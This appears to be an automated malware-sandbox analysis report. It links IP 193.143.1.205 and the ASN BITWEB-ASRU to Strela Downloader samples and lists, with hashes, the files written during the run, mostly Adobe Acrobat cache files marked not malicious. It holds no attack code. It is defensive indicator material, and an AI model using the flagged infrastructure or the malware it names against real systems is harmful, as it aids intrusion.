- Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 04:33:16 | API Interceptor | |
| 04:33:20 | API Interceptor | |
| 04:33:20 | API Interceptor | |
| 04:33:33 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
|
⊘No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
| ||
| Get hash | malicious | Strela Downloader | Browse |
|
⊘No context
⊘No context
| Process: | C:\Windows\System32\svchost.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1310720 |
| Entropy (8bit): | 1.3073501115222765 |
| Encrypted: | false |
| SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrL:KooCEYhgYEL0In |
| MD5: | DAC001FD9769EAF2E90AE60E9068CC70 |
| SHA1: | 9072E568102C0D303F0E4EBD149BFA1A2732CD9C |
| SHA-256: | 08575EE757D86CDF79234F66F5DC0D74AB48BFBFD1109F1525B74377588F3463 |
| SHA-512: | DBAE47D411CC012A6F249D1A07707E21E945686A3D7EEC7B28118A090DD46DD471C38D013F42B69CDF197496345DF0890AB4B813ADB1CCBEF4BDA6AA8F04396D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\svchost.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1310720 |
| Entropy (8bit): | 0.4221231547170074 |
| Encrypted: | false |
| SSDEEP: | 1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO |
| MD5: | 83C23C252CE3346F662DEAC704F43E8F |
| SHA1: | C0D76EA84498D7C44EEC191C14670EB17C2509F3 |
| SHA-256: | EE5D2D65B94158538FA92DBCFF0A4E0145461634FD9F2AA5DF4564A634E24896 |
| SHA-512: | A8F8CAC7755C5AD6CEA265C6307C75ECF58394A44C49DA5E3707F13AED27D076362AD93B03B00B8293D7E753ED9E914F0D707F6BAD40462A63784E8CE6D53FA7 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\svchost.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 16384 |
| Entropy (8bit): | 0.07701644798260271 |
| Encrypted: | false |
| SSDEEP: | 3:Kl6YeHmvjn13a/vq5rYllcVO/lnlZMxZNQl:xzHmv53qAMOewk |
| MD5: | 758DD145183B373C513AF4D149DB97AD |
| SHA1: | 98CDEB1B08D767747A37EF833CE633A4EB6F0532 |
| SHA-256: | 653D3995739ADE93DFB1995F9A89CC1100B0185C9DEC035D2C329075AD6CB692 |
| SHA-512: | 758887168AE1734CBB2D07B3CD17C10AE77737729097684E0A3635CF78B9B225E6AFC795D3EDFD97E5AF01F12AE70015ED66E675654CF16CDC67619E341F984A |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 289 |
| Entropy (8bit): | 5.190132315750708 |
| Encrypted: | false |
| SSDEEP: | 6:iOuFCI+q2Pwkn2nKuAl9OmbnIFUtQFYWZmw6FfVkwOwkn2nKuAl9OmbjLJ:74CI+vYfHAahFUtWf/EfV5JfHAaSJ |
| MD5: | 26BF1E312973159E0EF9D9FFCCFD7B60 |
| SHA1: | D78E563F99473C12566EDFDF411F216F17159607 |
| SHA-256: | B6C32825DB2A648F324447765B438DA5085EA8B74D4C07B3F9A48F8BC625B8F5 |
| SHA-512: | FA895D23EFD7E06B9E83496945E61A34D1E9210E0085EFB7914DE7676999424E69A5524BCB377D354B4A099BCC481AEDBA2D75C4873EBC7BD2C26AA61E38B5FC |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 289 |
| Entropy (8bit): | 5.190132315750708 |
| Encrypted: | false |
| SSDEEP: | 6:iOuFCI+q2Pwkn2nKuAl9OmbnIFUtQFYWZmw6FfVkwOwkn2nKuAl9OmbjLJ:74CI+vYfHAahFUtWf/EfV5JfHAaSJ |
| MD5: | 26BF1E312973159E0EF9D9FFCCFD7B60 |
| SHA1: | D78E563F99473C12566EDFDF411F216F17159607 |
| SHA-256: | B6C32825DB2A648F324447765B438DA5085EA8B74D4C07B3F9A48F8BC625B8F5 |
| SHA-512: | FA895D23EFD7E06B9E83496945E61A34D1E9210E0085EFB7914DE7676999424E69A5524BCB377D354B4A099BCC481AEDBA2D75C4873EBC7BD2C26AA61E38B5FC |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 336 |
| Entropy (8bit): | 5.205109821326657 |
| Encrypted: | false |
| SSDEEP: | 6:iOuF/yq2Pwkn2nKuAl9Ombzo2jMGIFUtQFix1Zmw6FinRkwOwkn2nKuAl9Ombzos:74/yvYfHAa8uFUtWi7/EinR5JfHAa8RJ |
| MD5: | 00DEF3625CC0DEF57A05631061B101E3 |
| SHA1: | 4B9643C805AA54C188AEE190F2BD1429378ED335 |
| SHA-256: | 4A49F41494DC7802227B784DFE7056A82D5188EFBE82622FAA1C0A247092EFE5 |
| SHA-512: | 318CCE48F7A34C3047DF20A7F6D2B768529B956AE5694776FB40C1C24F29D42789C0277344EBEB80D89D4FBFE0D610341AC05AFC04AC2B8A87BB65D2611D3169 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 336 |
| Entropy (8bit): | 5.205109821326657 |
| Encrypted: | false |
| SSDEEP: | 6:iOuF/yq2Pwkn2nKuAl9Ombzo2jMGIFUtQFix1Zmw6FinRkwOwkn2nKuAl9Ombzos:74/yvYfHAa8uFUtWi7/EinR5JfHAa8RJ |
| MD5: | 00DEF3625CC0DEF57A05631061B101E3 |
| SHA1: | 4B9643C805AA54C188AEE190F2BD1429378ED335 |
| SHA-256: | 4A49F41494DC7802227B784DFE7056A82D5188EFBE82622FAA1C0A247092EFE5 |
| SHA-512: | 318CCE48F7A34C3047DF20A7F6D2B768529B956AE5694776FB40C1C24F29D42789C0277344EBEB80D89D4FBFE0D610341AC05AFC04AC2B8A87BB65D2611D3169 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 475 |
| Entropy (8bit): | 4.945705949493566 |
| Encrypted: | false |
| SSDEEP: | 12:YH/um3RA8sqPdOxsBdOg2Htcaq3QYiubInP7E4T3y:Y2sRdskdMHc3QYhbG7nby |
| MD5: | D93E7D56A8F7D7EF655EF8652930AC18 |
| SHA1: | 822820AC55C8E591CAD47D5539C6985B51F131DF |
| SHA-256: | 115E5716CDE587BB51473FC0AE50AC67BAF378FDE4565DB2960A6E687ACD0323 |
| SHA-512: | AC252321104B4DEBD7457CEDA48889B6BBC2896F7DE607CB209A2930A92FCB8B09F3F5E415CDA26977AFC1CD6D7DA37FE35A90E0E150622C63089665AF10C8CE |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\dc504e64-639f-4bb5-8962-91d68696baa3.tmp
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 475 |
| Entropy (8bit): | 4.945705949493566 |
| Encrypted: | false |
| SSDEEP: | 12:YH/um3RA8sqPdOxsBdOg2Htcaq3QYiubInP7E4T3y:Y2sRdskdMHc3QYhbG7nby |
| MD5: | D93E7D56A8F7D7EF655EF8652930AC18 |
| SHA1: | 822820AC55C8E591CAD47D5539C6985B51F131DF |
| SHA-256: | 115E5716CDE587BB51473FC0AE50AC67BAF378FDE4565DB2960A6E687ACD0323 |
| SHA-512: | AC252321104B4DEBD7457CEDA48889B6BBC2896F7DE607CB209A2930A92FCB8B09F3F5E415CDA26977AFC1CD6D7DA37FE35A90E0E150622C63089665AF10C8CE |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4320 |
| Entropy (8bit): | 5.252787092229825 |
| Encrypted: | false |
| SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7+EazJL:etJCV4FiN/jTN/2r8Mta02fEhgO73goK |
| MD5: | 84F536F1C0C1449D1FAA7D27455194DB |
| SHA1: | 3A39C04395D7D06A209BCFA1B622FEC49F912AAC |
| SHA-256: | 084FF10CB1440F3F7A47DBD7365022EFA12CC1BC2DED936D9D86D6B3BA0BB16A |
| SHA-512: | A5309FD452C4C6290DB3FF5E894C3B4A8120B810EFCB0FF423CB22D37898E10D76C9BE6AEDFBC6D3166846B7F3E5E17246D18A8A499D61AF9C431B92FCCEBF00 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 324 |
| Entropy (8bit): | 5.168958955189952 |
| Encrypted: | false |
| SSDEEP: | 6:iOu2onyq2Pwkn2nKuAl9OmbzNMxIFUtQ2wmz1Zmw62gRkwOwkn2nKuAl9OmbzNMT:7UyvYfHAa8jFUtgmZ/uR5JfHAa84J |
| MD5: | EADCDF9D2B73795163948C8B345AC811 |
| SHA1: | 65723A3A8D056666208632DFE4AB685DCD4E94F5 |
| SHA-256: | 38E98B66FE6BAB6F1E8FB6B7114C9E52B56BAD0F24F87DE44004EB89A8E1A9D8 |
| SHA-512: | 24729524DE50D856B9045DA7FE4A66E1B1E12889426F3ACD517E9E3122B3C532044DE8775E5234244164EBFF3BEB91176FE39C488A2E51780B60966B9F1361A1 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 324 |
| Entropy (8bit): | 5.168958955189952 |
| Encrypted: | false |
| SSDEEP: | 6:iOu2onyq2Pwkn2nKuAl9OmbzNMxIFUtQ2wmz1Zmw62gRkwOwkn2nKuAl9OmbzNMT:7UyvYfHAa8jFUtgmZ/uR5JfHAa84J |
| MD5: | EADCDF9D2B73795163948C8B345AC811 |
| SHA1: | 65723A3A8D056666208632DFE4AB685DCD4E94F5 |
| SHA-256: | 38E98B66FE6BAB6F1E8FB6B7114C9E52B56BAD0F24F87DE44004EB89A8E1A9D8 |
| SHA-512: | 24729524DE50D856B9045DA7FE4A66E1B1E12889426F3ACD517E9E3122B3C532044DE8775E5234244164EBFF3BEB91176FE39C488A2E51780B60966B9F1361A1 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 86016 |
| Entropy (8bit): | 4.445266321361054 |
| Encrypted: | false |
| SSDEEP: | 384:SeOci5tDiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:KQs3OazzU89UTTgUL |
| MD5: | 7A2A5E03C740676A3A4AB1E904267CA8 |
| SHA1: | 5569FF223AE07C92E4893E054F4127159C82264F |
| SHA-256: | 68582CD53EF9FACDA60E77D2B5FC023D4850714D4EC8FBF5A465F05F7E5EC2F2 |
| SHA-512: | 657786D5B3FA3EFC8E500D045894F64A10B3898B2F7800532F46E3A87683FFFEFA1E12B9AFD778BDDFE7D89A71DC4362AEDF2C4484B8F0241F9DCBC5B7CCB100 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 8720 |
| Entropy (8bit): | 2.213057118020709 |
| Encrypted: | false |
| SSDEEP: | 24:7+txjNOnuwKKqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfS:7MvOnCKqvmFTIF3XmHjBoGGR+jMz+Lh6 |
| MD5: | 64390E94EA782D2E5B5016175D0AE86D |
| SHA1: | D22262031CCBD63598B149E4BD257C5F9BAA18F8 |
| SHA-256: | 5BC1BDA9729AAD553BCBEBF0BF6FEA9657A9D27A39BC3328DC0EAF1748B69DA6 |
| SHA-512: | F9979CA5DC6F9F4917C6BD58F0D9C92C9B4AC5217500E7A5D565CFA74EAA6B0F67FDC481406D8018BE7414391FA92836F8EF4C5D501892995C9E957E462936BB |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1391 |
| Entropy (8bit): | 7.705940075877404 |
| Encrypted: | false |
| SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
| MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
| SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
| SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
| SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 71954 |
| Entropy (8bit): | 7.996617769952133 |
| Encrypted: | true |
| SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
| MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
| SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
| SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
| SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 192 |
| Entropy (8bit): | 2.7276846957019485 |
| Encrypted: | false |
| SSDEEP: | 3:kkFklKqbstfllXlE/HT8k/kjNNX8RolJuRdxLlGB9lQRYwpDdt:kKTHeT82kRNMa8RdWBwRd |
| MD5: | FEC6EE057C960566B96B0E9B7841D389 |
| SHA1: | A5E14B75AC83348242BA5AD6864B354E7D78784F |
| SHA-256: | 6DEBBF011B1912635EA8910CBC368258DD086E510A0C49B43EC9E743D2297CF6 |
| SHA-512: | B2BFCF042EBB551A4DEAC322099B75F2144B3E7A2B3A00FE01E01C9FCC9FA82F5CF276BA44574C3B7C12D5C93A35E8EE43E569DF2BB7260828A9C4D2001DB004 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 328 |
| Entropy (8bit): | 3.2282958564524655 |
| Encrypted: | false |
| SSDEEP: | 6:kKa4/L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/iDImsLNkPlE99SNxAhUe/3 |
| MD5: | 155A3C4B58F3864A6B6CF147490F6F08 |
| SHA1: | 50096D54B63580E22717BE6F5E959A84C28653BE |
| SHA-256: | B5B642E570CAEA1BB8D1679F6AEB8032FBBF02C0397FE78236326A4998A9807D |
| SHA-512: | 27E46B1A2A87F92B5FE1008C62E7AC3270CA41982FB8475639755FD00B33C46850F476DB4762AE4435917B10B5D6B3A8EBE51CE07B71A777B0BBE59A8A23C242 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1233 |
| Entropy (8bit): | 5.233980037532449 |
| Encrypted: | false |
| SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
| MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
| SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
| SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
| SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1233 |
| Entropy (8bit): | 5.233980037532449 |
| Encrypted: | false |
| SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
| MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
| SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
| SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
| SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1233 |
| Entropy (8bit): | 5.233980037532449 |
| Encrypted: | false |
| SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
| MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
| SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
| SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
| SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 10880 |
| Entropy (8bit): | 5.214360287289079 |
| Encrypted: | false |
| SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
| MD5: | B60EE534029885BD6DECA42D1263BDC0 |
| SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
| SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
| SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 10880 |
| Entropy (8bit): | 5.214360287289079 |
| Encrypted: | false |
| SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
| MD5: | B60EE534029885BD6DECA42D1263BDC0 |
| SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
| SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
| SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 295 |
| Entropy (8bit): | 5.345939643311326 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJM3g98kUwPeUkwRe9:YvXKXqO2Zc0vQRcGMbLUkee9 |
| MD5: | 5B5402F0F81BD07CFC37D4B93BC0DC19 |
| SHA1: | 4F73B4542721CFA584D56DD7FDABA7C581E9FE8C |
| SHA-256: | BD64123FA1B0C3FC06EF7902028313ABDB586FCEAF4E9728595B58440851F15B |
| SHA-512: | 026CF68F956B3AF57FD4A1D5CF8608E83071AF28C7D125A8A29301FA8DD97CC759731F16A0DFD0D03831A725D09FD6BB32EFD55724394999B5947EF1C2622A20 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 294 |
| Entropy (8bit): | 5.29112035547186 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfBoTfXpnrPeUkwRe9:YvXKXqO2Zc0vQRcGWTfXcUkee9 |
| MD5: | 612E1E53878E224D84A199738BF51A6B |
| SHA1: | 13153C1AA07C437B39092DBE2BD436CB41A49072 |
| SHA-256: | 1757FAA338F1AC2873B10784E0EAD0389D8971855AEA88E5E411F125A09CF9DD |
| SHA-512: | 2068EE8AC96F5577DC9D8E31671CF6A40D2D110E2FFCB52A2DAB91B83BC406973EC4BB8BC488B108739CDB706FFC78A64BF61D04AEEA67C1BFF98B5FFEE417E8 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 294 |
| Entropy (8bit): | 5.270115390866937 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfBD2G6UpnrPeUkwRe9:YvXKXqO2Zc0vQRcGR22cUkee9 |
| MD5: | 3C3E23766E11137C4A7F3E5BD8F454A9 |
| SHA1: | 04501BB7B6E2D416836C7CC7088F51D35118565E |
| SHA-256: | 56DBC6F3825830F7AF1BE6527A024B971784D7DAC9C6974C1E3D6B600287FB1E |
| SHA-512: | D0949437245D0EDD3616FDE61497D3F1C573BD85C6B4DFB79CBA15F72F454198D66AA4F1D87CBC399683B81D452F84A0CB9A3FB94EEBEDBEDAB3C994191B7450 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 285 |
| Entropy (8bit): | 5.332338790102772 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfPmwrPeUkwRe9:YvXKXqO2Zc0vQRcGH56Ukee9 |
| MD5: | F77DB20A9B8D83D862FBE712508B9011 |
| SHA1: | BD89CFC392BF6C4AE8B5988E6D7AFCD9C00A75FA |
| SHA-256: | 9FE2746562C9FE40E726060D7ED1BEFCF75C3CF67EC91B4AA6B9BB2762EDC8A7 |
| SHA-512: | D83304B69BA4FD831D2FA0FAF65C89E6E995E9530F2CBE32D953926F77B21F6DD5CB93B713E08B4F3A456420A503877F878BE72C3BC6D222FA5D4EF0D098529E |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1123 |
| Entropy (8bit): | 5.687678048081353 |
| Encrypted: | false |
| SSDEEP: | 24:Yv6XqnzvQ/pLgE9cQx8LennAvzBvkn0RCmK8czOCCS/:YvVzGhgy6SAFv5Ah8cv// |
| MD5: | 8F94CFFCAF8F4467B1DEDF353ABD4232 |
| SHA1: | 27EB6BDC3CA09F5BB36F510ED7856DFBFA5246A6 |
| SHA-256: | D97D5B67F40E6A28C4220CD44F1A6CEA116FCD9D409AD9B131E1D1BD6430B048 |
| SHA-512: | 1D7BC84A9D071C98E6F82E2CBDAB17353AA3B697F2C4A7122FDFD5E636A0ABB97AFDBF610656D69FD0B9E0D45C29F226F7AB7EBA52297496417AEFAD43764CDC |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 289 |
| Entropy (8bit): | 5.278229799555889 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJf8dPeUkwRe9:YvXKXqO2Zc0vQRcGU8Ukee9 |
| MD5: | 155AFBC5F45B88C427A2444499F1FE71 |
| SHA1: | 32A2C9607213C6CA314A37EDB95CDEEBF5BB7326 |
| SHA-256: | B30A9516E0D33734577D8985A2EBB5987E9340411CDDB612EE7632BB349AC273 |
| SHA-512: | 4536009CE5CF1414149F1538AD707F48AFFB1A2EA41207001253B0EFDC7DA900157FC02F70224D12CC34BB73E401BAFA4E162B60ABAFD96954E5ED76B00D1F5F |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 292 |
| Entropy (8bit): | 5.28264490101852 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfQ1rPeUkwRe9:YvXKXqO2Zc0vQRcGY16Ukee9 |
| MD5: | 30260BCF1345ADABC3DA34D386627EFF |
